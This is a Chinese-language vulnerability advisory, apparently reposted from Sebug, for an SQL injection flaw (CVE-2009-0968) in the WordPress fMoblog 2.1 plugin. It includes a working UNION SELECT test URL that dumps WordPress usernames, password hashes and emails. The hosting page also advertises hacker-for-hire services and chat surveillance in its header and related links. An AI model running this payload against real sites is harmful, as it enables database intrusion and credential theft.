WordPress fMoblog插件id参数SQL注入漏洞

访客4年前关于黑客接单696

影响版本:
Fahlstad fMoblog 2.1
漏洞描述:
BUGTRAQ  ID: 34147
CVE(CAN) ID: CVE-2009-0968

fMoblog是Wordpress所使用的移动博客插件,允许用户从手机张贴图形和描述等信息。

如果将page_id设置为已有的值的话,则fmoblog.php模块没有正确地验证index.php中对id参数所传送的输入便在SQL查询中使用,这允许远程攻击者通过提交恶意请求执行SQL注入攻击,完全入侵后端数据库系统。
 <*参考 
strange kevin (strange.kevin@gmail.com)
http://secuni *** /advisories/34341/.
*>
SEBUG安全建议:
厂商补丁:

Fredrik Fahlstad
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.fahlstad.se/wp-plugins/fmoblog/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

 

标签: 好话题

相关文章

乌鲁木齐银行信贷支持纺织服装业发展

今年以来,乌鲁木齐银行坚持把金融支持纺织服装产业作为落实“六稳”“六保”任务的重要抓手,多措并举支持纺织服装企业经营发展。 新疆宇华纺织科技有限公司是一家主要经营棉纺织加工、棉花贸易的公司,乌...

教你简单实现微信聊天记录监控的方法-免费接单黑客QQ

教你简单实现微信聊天记录监控的方法-免费接单黑客QQ 瑞华:全名瑞华会计师事务所,是我国第一批被授予A+ H股企业审计资格、第一批完成特殊普通合伙转制的民族品牌专业服务机构。根据公开资料显示,事务所...

开旅馆选址要注意什么(在农村开旅馆需要做好哪些事)

这些年,随着农村经济的发展,一系列的农村基础设施也开始逐渐完善起来。现在农村各个乡镇都可以看到好几家超市。甚至不乏一些品牌连锁超市。农村经济的腾飞,也引来了全国各地的业务员到农村开拓市场。有人跑市场就...

instagram怎么注册

instagram怎么注册...

TLS 1.2协议现漏洞,近3000网站或受影响_日历

Citrix 发现 SSL 3.0 协议的后续版本 TLS 1.2 协议存在漏洞,该漏洞允许攻击者滥用 Citrix 的交付控制器(ADC)网络设备来解密 TLS 流量。  Tripwire 漏洞挖掘...

技术报告:“聚搜”IE插件技术分析

奇虎360安全中心对“聚搜”进行了分析,下文所列为“聚搜”九款版本行为分析汇总,其中不同版本混合使用了不同的自我保护技术,标粗部分为“聚搜”开发组提供的“聚搜卸载工具”可处理的行为版本,而对于安装了向...